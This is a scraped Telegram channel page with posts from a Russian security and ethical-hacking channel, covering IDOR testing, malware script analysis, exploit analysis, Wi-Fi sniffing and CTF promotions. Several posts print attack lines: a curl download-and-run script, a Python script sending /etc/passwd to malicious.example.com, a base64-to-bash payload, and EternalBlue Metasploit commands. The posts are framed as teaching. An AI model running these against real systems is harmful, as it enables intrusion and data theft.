ch
Feedback
CodeGuard: PySec Edition

CodeGuard: PySec Edition

关闭频道

Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

显示更多

📈 Telegram 频道 CodeGuard: PySec Edition 的分析概览

频道 CodeGuard: PySec Edition 是活跃参与者。目前社区聚集了 14 180 名订阅者,在 技术与应用 类别中位列第 8 724,并在 俄罗斯 地区排名第 45 616 位。

📊 受众指标与增长动态

自 невідомо 创建以来,项目保持高速增长,吸引了 14 180 名订阅者。

根据 29 九月, 2026 的最新数据,频道保持稳定运转。过去 30 天订阅人数变化为 873,过去 24 小时变化为 56,整体触达仍然可观。

  • 认证状态: 未认证
  • 互动率 (ER): 平均受众互动率为 9.97%。内容发布后 24 小时内通常能获得 5.53% 的反应,占订阅者总量。
  • 帖子覆盖: 每篇帖子平均可获得 1 413 次浏览,首日通常累积 784 次浏览。
  • 互动与反馈: 受众积极参与,单帖平均反应数为 6。
  • 主题关注点: 内容集中在 codeguard, pysec, docker, grep, контейнер 等核心主题上。

📝 描述与内容策略

作者将该频道定位为表达主观观点的平台:
“Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”

凭借高频更新(最新数据采集于 30 九月, 2026),频道始终保持新鲜度与高覆盖。分析显示受众积极互动,使其成为 技术与应用 类别中的关键影响点。

14 180
订阅者
+5624 小时
+1687 天
+87330 天
帖子存档
⚡️ RECURA — один из лучших каналов для разработчиков и программистов. Канал ведёт практикующий DevOps-инженер, который ежедне
⚡️ RECURA — один из лучших каналов для разработчиков и программистов. Канал ведёт практикующий DevOps-инженер, который ежедневно публикует: 🔹код, повышающий эффективность разработки 🔹лайфхаки и полезные трюки для Bash и Linux 🔹готовые решения для Docker и Kubernetes 🔹инструменты и утилиты для автоматизации 🔹полезные материалы и советы по информационной безопасности ⚠️ Подпишись, чтобы быть востребованным специалистом.

🆒 CodeGuard — это не просто один канал, а целая сеть полезных проектов для вас! Актуальные ресурсы ниже:
PySec Edition Материалы по кибербезу. Linux Не для всех, но именно для тебя. SciencePop Научно-популярный журнал для инженеров и разработчиков Vacancy IT Вакансии, фриланс и топовые подборки Chat CodeGuard Сообщество единомышленников, пообщаться и спросить. Archive Шпоры, книги и материалы для обучения. @N3tHunterLab Ламповый канал про ИБ и все что с ним связано.
Спасибо, что вы здесь — вместе мы сильнее!

🔍 Как найти и использовать уязвимость в публичном API Публичные API — это интерфейсы, через которые приложения общаются друг с другом. Иногда в них бывают ошибки, которые позволяют злоумышленникам получить доступ к данным или изменить их. Расскажу, как проверить API и найти такие уязвимости. ⚙️ Шаг 1. Узнаём, как работает API API — это набор адресов (endpoint), куда отправляются запросы. Например:
https://api.example.com/users/123
где 123 — это ID пользователя. Используем программу Postman или просто команду curl, чтобы посмотреть, что вернёт сервер:
curl https://api.example.com/users/123 -H "Authorization: Bearer токен_доступа"
Если нет токена, попробуй запросить без него — иногда API плохо проверяет права. ➡️ Шаг 2. Проверяем уязвимость — можно ли получить чужие данные? Попробуй подставить другой ID пользователя:
curl https://api.example.com/users/124 -H "Authorization: Bearer твой_токен"
Если API вернёт данные пользователя 124, хотя ты должен видеть только свои, значит тут уязвимость — её называют IDOR (Insecure Direct Object Reference). ➡️Шаг 3. Что можно сделать, если уязвимость есть? Можно читать чужие данные, а иногда — менять их. Например, изменить email:
curl -X PUT https://api.example.com/users/124 \
     -H "Authorization: Bearer твой_токен" \
     -H "Content-Type: application/json" \
     -d '{"email":"hacker@example.com"}'
Если это сработало — значит API не проверяет права правильно, и это опасно. ➡️Шаг 4. Немного автоматизации с Python Можно быстро проверить, доступен ли чужой аккаунт, заменяя ID:
import requests

url = "https://api.example.com/users/"
token = "твой_токен"
headers = {"Authorization": f"Bearer {token}"}

for user_id in range(120, 130):
    r = requests.get(url + str(user_id), headers=headers)
    if r.status_code == 200:
        print(f"Данные пользователя {user_id} доступны!")
Главное: Проверяй только то, что разрешено, иначе это незаконно. 😈 CodeGuard | #API #pentest #curl #python #vulnerability

⚠️ [Перевод] SSL-сертификаты в 2025: самый прибыльный развод в истории интернета $199 за файл. Не за программу. Не за базу да
⚠️ [Перевод] SSL-сертификаты в 2025: самый прибыльный развод в истории интернета $199 за файл. Не за программу. Не за базу данных. Даже не за документ с полезной информацией. За файл в несколько килобайт зашифрованного текста, который говорит браузеру «этот сайт действительно тот, за кого себя выдает». В 2005 году именно столько стоил SSL‑сертификат от VeriSign. Каждый год. За каждый домен. Без исключений. Сегодня точно такую же безопасность, идентичное шифрование, то же доверие браузеров, ту же защиту — можно получить бесплатно. Установить за 30 секунд, так еще и продлевать автоматически. Но вот, в чем мем: хостинг‑компании до сих пор берут $50, $100, а то и $200 за «премиальные» SSL‑сертификаты, которые работают абсолютно так же, как бесплатные. Как целая индустрия продолжает драть деньги за то, что стало товаром широкого потребления и полностью автоматизировано?
Добро пожаловать в историю самого прибыльного развода в истории интернета. Развода настолько элегантного, так хорошо прорекламированного и так глубоко укоренившегося в хостинг‑индустрии, что он продолжает печатать деньги даже после того, как все знают, что это развод.
➡️ Продолжение тут 😈 CodeGuard | #cybersecurity

💻OWASP Juice Shop — идеальная площадка для практики пентеста OWASP Juice Shop — это уязвимое веб-приложение, специально созд
💻OWASP Juice Shop — идеальная площадка для практики пентеста OWASP Juice Shop — это уязвимое веб-приложение, специально созданное для обучения и прокачки навыков безопасности. 🌐 Внутри — целый набор проблем разной сложности, которые нужно найти и успешно использовать для эксплуатации. Так что это не просто учебник, а настоящий вызов! 🔥Это отличный старт, если хотите понять, как искать и использовать уязвимости в веб-приложениях. Можно тренироваться в безопасной среде, участвовать в CTF и проверять свои инструменты.
📌Почему OWASP Juice Shop? - Покрывает все основные уязвимости из списка OWASP Top 10 - Современный стек: Node.js, Express, Angular, что приближает его к реальному вебу - Подходит как новичкам, так и профи для практики и экспериментов - Отслеживание прогресса через баллы — геймификация помогает идти дальше
Изучать веб-безопасность и пентест — попробуй Juice Shop! 😈 CodeGuard | #pentest #infosec #owasp #websecurity #ctf

Будете участвовать? Призы будут)
Anonymous voting

👨‍💻 Хотите поучаствовать в CTF? Голосуйте! Планируем запустить собственный сервер с CTF-соревнованием — с интересными задач
👨‍💻 Хотите поучаствовать в CTF? Голосуйте! Планируем запустить собственный сервер с CTF-соревнованием — с интересными задачами и реальными призами! Хотите попробовать свои силы, прокачать навыки и посоревноваться с другими? 🔹 Оставьте лайк или коммент ниже, если готовы участвовать. Будет классно, если удастся организовать регулярные турниры с наградами. Готовы? Давайте посмотрим, сколько нас соберётся! Делитесь, чтобы собрать команду друзей! 😈 CodeGuard | #ctf #соревнования

🔥 Деконструкция вредоносного ПО: что скрывается за базовыми скриптами Многие думают, что «вредоносное ПО — это что-то сложное». На самом деле, масса атакующих скриптов написаны на Bash или Python и выглядят просто(имхо). Но за простотой скрывается продуманная логика и опасные техники. Разберём базовые примеры. 👩‍💻 1. Вредоносный Bash-скрипт: распространение и запуск команд Пример простого скрипта, который скачивает и запускает вредоносный файл:
#!/bin/bash
# Скачиваем вредоносный файл и запускаем
curl -s http://malicious.example.com/malware.sh -o /tmp/malware.sh
chmod +x /tmp/malware.sh
/tmp/malware.sh &
-- Используется curl для загрузки файла с C&C сервера — Запуск выполняется в фоне — скрытно для пользователя — Вредоносный payload может быть любым — удалённое выполнение команд, майнинг, шпионаж 👩‍💻 2. Python-скрипт для сбора и отправки данных Пример кода на Python, который читает локальный файл с паролями и отправляет на удалённый сервер:
import requests

def steal_data():
    with open('/etc/passwd', 'r') as file:
        data = file.read()
    url = 'http://malicious.example.com/collect'
    requests.post(url, data={'content': data})

if __name__ == "__main__":
    steal_data()
- Используется модуль requests для HTTP-запроса - Чтение системного файла /etc/passwd — могут быть и конфиги, и ключи - Все данные отправляются на фишинговый или контролируемый сервер 🤔 3. Техники маскировки и обхода - Скрипты часто запускаются из cron или через systemd для постоянства - Логи и консольный вывод отключают или направляют в /dev/null - Используются переменные среды и шифрование для сокрытия URL и команд 📖 4. Как анализировать такие скрипты — Покомандно и построчно читать код — понимать что делает каждая строка — Использовать bash -x script.sh или добавлять print() в Python для отладки — Запускать в песочнице (VM) под контролем системы мониторинга — Перехватывать сетевой трафик с помощью tcpdump или Wireshark 👩‍💻 5. Мини-скрипт для распаковки закодированных строк в Bash Иногда payload шифруют base64:
echo "Y3VybCAtcyBodHRwOi8vbWFsaWNpb3VzLmV4YW1wbGUuY29tL21hbHdhcmUuc2g=" | base64 -d | bash
Для анализа достаточно выполнить декодировку:
echo "строка_в_base64" | base64 -d
👩‍💻 6. Пример Python скрипта для запуска шелл-команд и сбора вывода
import subprocess

cmd = "uname -a"
result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)
print(result.stdout.decode())
Эта техника часто используется для сбора информации о системе. Простые на вид скрипты — это часто высокоэффективные инструменты атак. Важно уметь их читать, распаковывать и анализировать логику. Постоянная практика и инструменты помогут выявлять угрозы. ⭐️ CodeGuard | #malware #bash #python #pentest #reverseengineering

🌃 Инструментарий: GoSearch — поиск по нику на 300+ сайтах Ищешь быстрый и удобный способ найти аккаунты человека или проверить компрометации? Тогда GoSearch — топовый выбор! 🚀 Работает значительно быстрее аналогов типа Sherlock благодаря многопоточности. ⚙️ Главное: умеет проверять утечки через API HudsonRock, ProxyNova и BreachDirectory — это значит, что вы получите не только файндинг аккаунтов, но и инфу о возможных утечках данных. 📱Репозиторий на GitHub: https://github.com/ibnaleem/gosearch Ставь 👍, если хочешь больше топовых инструментов для быстрого и эффективного сбора инфы! 😈 CodeGuard | #osint #pentesting

🌍 Дашборды для OSINT и глобального мониторинга Если нравится наблюдать за изменениями в мире в масштабах континентов и стран
🌍 Дашборды для OSINT и глобального мониторинга Если нравится наблюдать за изменениями в мире в масштабах континентов и стран, эта подборка дашбордов для вас. Отличный источник данных и вдохновения для OSINT-аналитиков! 1. Shadowserver dashboard Команда Shadowserver отслеживает DDoS, ботнеты, сканирование портов и CVE-уязвимости. Ежедневно обновляемая статистика на интуитивных картах. 2. Shodan internet exposure dashboard Открытые базы, АСУ ТП, торчащие наружу порты с разбивкой по регионам. 3. Global ransomware attacks Карта по атакам программ-вымогателей с 2018 года: сектора экономики, типы программ и суммы выкупа. 4. cybermap.kaspersky Красочный глобус от Лаборатории Касперского с актуальной статистикой угроз. 5. Live Threat Map Сводка кибератак за последний час, сутки и месяц, с топами по странам и типам атак. 6. Talos reputation center Комплексная панель киберугроз от Cisco Talos. 7. Cyber Attack Map Топ серверов-распространителей спама и вредоносного ПО. 8. Sicherheitstacho Сервис от Deutsche Telekom на базе опенсорс ханипотов T-Pot. 9. Cyber map от HTTPCS Агрегация угроз по странам, с расширенной статистикой (требуется регистрация). Эти дашборды не только красивы, но и позволяют быть в курсе динамики киберугроз в мире. 😈 CodeGuard | #osint #cybersecurity #threatmonitoring

🔥 Как читать и анализировать эксплоиты к уязвимостям: первые шаги Эксплоит — это код, который использует баг в программе для получения несанкционированного доступа или другой атаки. Чтобы понять и изучить эксплоиты, важно пошагово подходить к их анализу. ✅1. Изучи уязвимость и её описание (CVE и контекст) Перед организацией анализа скачай описание уязвимости: на сайте [Exploit-DB], [NVD] или в Metasploit. Пойми, как устроена ошибка и где она появляется. ✅2. Зацени код эксплоита Обычно он написан на Python, Bash, Ruby, C или PowerShell. Раздели код на части: - Подготовка окружения - Точки входа (например, функция, куда подаются данные) - Основной функционал атаки — какая команда выполняется, что изменяется. ✅3. Запусти безопасную тестовую среду - Используй виртуальную машину (VirtualBox, VMware) - Установи уязвимую версию софта - Отключи сеть (по необходимости) или используи изолированную сеть ✅4. Проверь зависимости и права Если эксплоит использует внешние библиотеки или команды, убедись, что всё установлено (или установи):
pip install -r requirements.txt
или
sudo apt-get install <пакет>
✅5. Запусти эксплоит с ключами отладки Добавляй команды вывода для отслеживания: - Для Bash: поставь set -x в начале скрипта - Для Python добавь print() для важных переменных - И запускай из терминала:
python3 exploit.py --target 192.168.0.10
✅6. Анализируй сетевой трафик Во время запуска эксплоита захватывай трафик с помощью tcpdump или наблюдай через Wireshark:
sudo tcpdump -i eth0 -w exploit_traffic.pcap
wireshark exploit_traffic.pcap
✅7. Мини-пример на Python для теста уязвимости (Buffer Overflow)
import socket

target_ip = "192.168.0.10"
target_port = 9999

payload = b"A" * 1024  # заполняем буфер для взлома

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(payload)
print("Payload отправлен!")
s.close()
Этот скрипт посылает 1024 символа ‘A’ на указанный порт — простой тест на переполнение буфера или отслеживание реакции сервера. ✅ 8. Используй Exploit-DB и Metasploit - Для поиска эксплоитов:
searchsploit <название_уязвимости>
- Запуск Metasploit:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.0.10
run
⚠️ Важное: обязательно анализируй эксплоиты в изолированной и контрольной среде во избежание вреда. Эти навыки — основа в тестировании безопасности. тебе еще весело? или слишком много надо понимать? желание быть хакером пропадает?)) а это только первые шаги...) ⭐️ CodeGuard | #pentest #exploit #bugbounty #cve

📀 Goffeeйнная гуща: актуальные инструменты и особенности группировки GOFFEE в атаках на Россию В течение 2024 года несколько
📀 Goffeeйнная гуща: актуальные инструменты и особенности группировки GOFFEE в атаках на Россию В течение 2024 года несколько российских организаций обращались к команде по реагированию на киберинциденты экспертного центра Positive Technologies (PT ESC IR) для расследования инцидентов, между которыми удалось обнаружить сходство. В рамках анализа вредоносная активность инцидентов была объединена в один кластер и связана с группой Goffee, атакующей российские организации с помощью фишинга с 2022 года. В этой статье мы расскажем про вредоносное ПО, которое используют злоумышленники в атаках, в том числе речь пойдет о ранее неизвестном рутките под Linux, который был замечен в одном из инцидентов. 😎 Можно глянуть позже 😈 CodeGuard | #linux

🤔 Книга: «Сети глазами хакера» Автор: Базаров М. М. Год: 2025
Если интересуешься сетевой безопасностью и хочешь понять, как устроены сети с точки зрения хакера, эта книга — отличный выбор. 👩‍💻 Что внутри: - Практические рекомендации по пентесту сетей Cisco - Разбор протокола DTP от Cisco Systems - Подробный гайд по тестированию канального уровня сети и безопасности MikroTik - Методики пентестов с минимальным ущербом инфраструктуре - Советы по использованию Kali Linux для эффективного тестирования - Использование виртуальных машин для постэксплуатации - Рекомендации по защите сетей от атак - Примеры техник как для хакеров, так и для защитников 💠 Рекомендуется всем, кто хочет глубже понять внутреннее устройство сетей и методы их проверки безопасности! 💠 Бери книгу → [Archive] 😈 CodeGuard | #book #pentest #networksecurity

Repost from Arakcheev
🚀 Хочешь прокачать навыки кибербеза и Linux? Попробуй себя в CTF с игрой Bandit от OverTheWire. Это пошаговая игра с уровнями — от 0 и дальше, где каждая задача учит практическим навыкам работы с командной строкой, SSH, файлами и разрешениями. Отличный способ освоить основы, чтобы уверенно двигаться в мир кибербезопасности и варгеймов.
Как проходит игра? — Игра организована по уровням, начиная с Уровня 0. — На каждом уровне вам нужно получить пароль для следующего уровня, решая задачи с помощью команд Linux, анализа файлов и системных инструментов. — Завершив уровень, вы используете полученный пароль, чтобы подключиться к следующему пользователю через SSH и перейти дальше.
Задачи обучают пониманию основных команд и инструментов, а также навыкам анализа и поиска. 🖥 Начинаем? Подключайтесь по SSH к серверу, начиная с Уровня 0:
ssh bandit0@bandit.labs.overthewire.org -p 2220
password: bandit0
— Первые семь задач я специально подготовил и разместил ниже под этим постом — тут. — Так же под этим постом, есть подсказки + ответы. Рекомендую пользоваться подсказками и не рекомендую пользоваться ответами))
— Полный список задачи здесь! — Вопросы по подключению — пиши! Прокачивайтесь, задавайте вопросы и делитесь успехами — вместе точно эффективней. @N3tHunterLab

Repost from Arakcheev
🚀 Хочешь прокачать навыки кибербеза и Linux? Попробуй себя в CTF с игрой Bandit от OverTheWire. Это пошаговая игра с уровнями — от 0 и дальше, где каждая задача учит практическим навыкам работы с командной строкой, SSH, файлами и разрешениями. Отличный способ освоить основы, чтобы уверенно двигаться в мир кибербезопасности и варгеймов.
Как проходит игра? — Игра организована по уровням, начиная с Уровня 0. — На каждом уровне вам нужно получить пароль для следующего уровня, решая задачи с помощью команд Linux, анализа файлов и системных инструментов. — Завершив уровень, вы используете полученный пароль, чтобы подключиться к следующему пользователю через SSH и перейти дальше.
Задачи обучают пониманию основных команд и инструментов, а также навыкам анализа и поиска. 🖥 Начинаем? Подключайтесь по SSH к серверу, начиная с Уровня 0:
ssh bandit0@bandit.labs.overthewire.org -p 2220
password: bandit0
— Первые семь задач я специально подготовил и разместил ниже под этим постом. — Так же под этим постом, есть подсказки + ответы. Рекомендую пользоваться подсказками и не рекомендую пользоваться ответами))
— Полный список задачи здесь! — Вопросы по подключению — пиши! Прокачивайтесь, задавайте вопросы и делитесь успехами — вместе точно эффективней. @N3tHunterLab

🖥 Как использовать Wireshark для анализа сетевого трафика: пошаговое руководство Wireshark — один из самых мощных и популярных инструментов для анализа сетевого трафика, используемый в кибербезопасности, администрировании и сетевой диагностике. Он позволяет в реальном времени захватывать и подробно изучать данные, проходящие через вашу сеть. 🚀 Шаг 1: Запуск Wireshark и захват трафика - Установите Wireshark (доступен для Windows, Linux, macOS): [официальный сайт](https://www.wireshark.org/) - Запустите программу и выберите сетевой интерфейс, через который идет трафик (например, Wi-Fi или Ethernet) - Нажмите кнопку «Start», чтобы начать захват пакетов 🔮 Шаг 2: Фильтры для удобства анализа Wireshark поддерживает фильтры захвата и отображения. Они помогают сосредоточиться на нужных данных и не теряться в потоках информации. Примеры популярных фильтров для отображения: - http — отобразить только HTTP-трафик - ip.addr == 192.168.1.5 — отображать пакеты, связанные с конкретным IP - tcp.port == 443 — показать трафик HTTPS - dns — отобразить DNS-запросы и ответы 🔍 Шаг 3: Анализ структуры пакета Выберите интересующий пакет в списке — в нижних панелях увидите детальную информацию: - Ethernet Header — MAC-адреса отправителя и получателя - IP Header — IP-адреса источника и назначения - TCP/UDP Header — порты и параметры соединения - Application Layer — данные, например, HTTP-запросы и ответы 💾 Шаг 4: Сохранение и экспорт данных Захваченные данные можно сохранить в файл для последующего анализа: File → Save As → выберите формат (например, .pcapng) и место хранения 🛡Пример практического использования: - Отследите подозрительный IP, используя фильтр: ip.addr == <адрес> - Анализируйте содержимое HTTP-запросов, чтобы выявить уязвимости и аномалии ⚠️ Помните: использование Wireshark должно соответствовать правилам и этике — перехват сетевого трафика без разрешения владельцев может быть незаконным. ✔️ Полезные ссылки и гайды: - Подробное руководство на Хабре: [Основы работы с Wireshark] - Видеообзор и пошаговая установка: [YouTube] Андрей Must have - Руководство от Timeweb: [Как анализировать трафик через Wireshark] Ставь 👍, тебе не сложно - мне мотивация пилить посты 😈 CodeGuard | #Wireshark #NetworkAnalysis #SysAdmin

💻 Шпаргалка по защите сервера от хакеров и другой нечисти Когда сервер создаётся для личных нужд — часто про безопасность забывают. А это очень опасно! Даже если это игровой сервер или хранилище, через 15 минут после появления публичного IP он попадает под автоматическое сканирование и атаки ботнетов. Вот проверенный набор советов, чтобы защитить сервер от взлома и несанкционированного доступа:
✅Защита — nоn fiсtion; ✅Намудрите сложные пароли; ✅Используйте fail2ban; ✅Включите подключение по SSH; ✅Забудьте про root; ✅Используете безопасные протоколы; ✅Актуализируйте версии ОС и ПО; ✅Процедите порты; ✅Подключите двухфакторку; ✅Защитите сервер от DDoS; ✅Логируйте и мониторьте; ✅Выводы.
Эти простые шаги могут обезопасить сервер даже от большинства автоматических сканеров и ботов. 🔐 Безопасность — не на уровне «посмотрю по фигу», а на уровне «делаю правильно». 😈 CodeGuard | #security #sysadmin

⚡️ Как перехватывать Wi-Fi трафик с Kali Linux: быстрый гайд Кратко расскажу как мониторить Wi-Fi трафик и видеть, что происходит в радиусе действия, Kali Linux и несколько простых команд, которые тебе помогут. ✔️ 1. Переводим Wi-Fi адаптер в режим мониторинга
sudo airmon-ng check kill  
sudo airmon-ng start wlan0  
Это отключит службы, мешающие работе, и включит мониторинг на интерфейсе wlan0mon. ✔️ 2. Смотрим доступные сети и клиентов
sudo airodump-ng wlan0mon  
На экране появится список сетей, их каналов, MAC-адресов и активных клиентов. ✔️ 3. Сохраняем трафик с конкретной точки доступа
sudo airodump-ng --bssid <MAC_точи_доступа> -c <канал> -w capture wlan0mon  
Заменяем <MAC_точи_доступа> и <канал> на данные из предыдущего шага, чтобы сфокусироваться на нужной сети. ✔️ 4. Перехватываем трафик с tcpdump
sudo tcpdump -i wlan0mon -w traffic.pcap  
Запишет весь трафик в файл для последующего анализа. ✔️ 5. Анализируем в Wireshark
wireshark traffic.pcap  
Открываем файл, фильтруем HTTP, DNS или другие протоколы, ищем интересные данные. Этот пошаговый гайд — отличный старт для понимания сниффинга и мониторинга. Никакой магии, только команды и инструменты. расскажи другу и поставь 👍 ⭐️ CodeGuard | #pentest #kali #wifi

+3
💥 Взлом для начинающих [Часть 1] Это емкий курс — именно то, что нужно новичкам, чтобы получить базовое понимание хакинга и пройти первые шаги. 🔹Что внутри: 📍 Интернет и IP-адреса — что к чему 📍 NAT и преобразование сетевых адресов 📍 Как работает система доменных имён (DNS) 📍 Серверы, сервисы и порты — основы 📍 Понимание пакетов и протоколов 📍 Что такое 4 ключевых компонента для взлома 📍 Как находить уязвимости и использовать их 📍 Получать полный контроль над целью ⚠️ Правда: курс поверхностный — он лишь открывает дверь в мир взлома. Тем, у кого уже есть опыт с сетями и вебом будет легко. p.s вторая часть будет в след пятницу) Для новичков же — отличный старт, чтобы понять логику, почувствовать процесс и решиться двигаться дальше. 🥡 Полная Часть 1 в Архиве — последний пост ⭐️ CodeGuard | Chat | #pentest #kali #course

⚠️ Ребята, увидел пост у @N3tHunterLab — компания F6 проводит крутой CTF! Не упустите шанс проверить свои навыки по реверс-ин
⚠️ Ребята, увидел пост у @N3tHunterLab — компания F6 проводит крутой CTF! Не упустите шанс проверить свои навыки по реверс-инжинирингу и решить реальную головоломку — на кону классный мерч от F6! Напомню, это не просто учебное задание, а реальная история: специалисты F6 помогли детскому саду расшифровать файлы после атаки вымогателя, и теперь предлагают вам повторить этот опыт. ⚠️ Осталось совсем немного времени — победителей объявят 15 сентября. 🗣 Подробнее тут